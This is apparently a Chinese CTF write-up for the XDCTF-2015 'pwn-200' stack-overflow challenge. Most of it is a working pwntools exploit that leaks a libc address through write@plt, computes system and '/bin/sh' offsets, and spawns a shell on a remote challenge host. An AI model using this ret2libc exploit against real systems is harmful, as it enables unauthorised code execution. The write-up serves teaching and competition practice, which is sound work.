pwn-200
题目来源: XDCTF-2015
栈溢出漏洞，程序未开启 canary 和 PIE：可以直接覆盖返回地址，且二进制内的 PLT/GOT 地址是固定的，可以直接硬编码。
DynELF 不知为何无法解析 system 函数，因此改为通过 write@plt 泄露 write@got 中的 libc 地址，再到 libc-database 查询对应 libc 版本的偏移（write、system、"/bin/sh"），以此计算 libc 基址。注意这些偏移只对远程那一个 libc 版本有效。
exp如下:
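from pwn import *

# Exploit for XDCTF-2015 pwn-200: plain stack overflow, no canary, no PIE.
# Run with `python exp.py LOCAL` to attack a local copy instead of the remote
# target; pass DEBUG on the command line to have pwntools dump raw traffic.
if args.LOCAL:
    io = process('./pwn-200')
else:
    io = remote('111.200.241.244', 59980)

# Addresses inside the (non-PIE) binary; they are the same on every run.
main_addr = 0x80484BE
write_plt = 0x80483C0
read_plt = 0x8048390    # not used by this exploit, kept from the original notes
goal_addr = 0x804a100   # not used by this exploit, kept from the original notes
write_got = 0x804A010

PAD_LEN = 112  # bytes from the start of the overflowed buffer to the saved return address
BANNER = 'Welcome to XDCTF2015~!\n'

# Offsets inside the target's libc, obtained from libc-database using the
# leaked write() address.  They are only valid for that exact libc build;
# against a different libc the computed addresses will be wrong.
LIBC_WRITE_OFF = 0xd43c0
LIBC_SYSTEM_OFF = 0x3a940
LIBC_BINSH_OFF = 0x15902b


def leak(address):
    """Leak the 4 bytes at *address* by calling write(1, address, 4).

    The overflow overwrites the saved return address with write@plt, the
    next word with main (so the program can be overflowed again after the
    leak) and then the three arguments of write().

    Returns the raw 4 leaked bytes (little-endian), ready for u32().
    """
    payload = b'a' * PAD_LEN + p32(write_plt) + p32(main_addr)
    payload += p32(1) + p32(address) + p32(4)
    io.recvuntil(BANNER)
    io.send(payload)
    # recvn, not recv: recv(4) may legitimately return fewer than 4 bytes,
    # and u32() raises on anything other than exactly 4.
    return io.recvn(4)


# Stage 1: leak write@got to locate libc.
write_addr = u32(leak(write_got))
info('write_addr: ' + hex(write_addr))
libc_base = write_addr - LIBC_WRITE_OFF
info('libc_base: ' + hex(libc_base))
# libc is mapped page-aligned; a misaligned base means the leak is wrong or
# the write() offset does not belong to the remote libc build.
if libc_base & 0xfff:
    error('libc_base is not page aligned; wrong libc offsets?')
system_addr = libc_base + LIBC_SYSTEM_OFF
info('system_addr: ' + hex(system_addr))
binsh_addr = libc_base + LIBC_BINSH_OFF
info('binsh_addr: ' + hex(binsh_addr))

# Stage 2: ret2libc -- system("/bin/sh"), with main as the fake return address.
payload = b'a' * PAD_LEN + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
io.recvuntil(BANNER)
io.send(payload)
io.interactive()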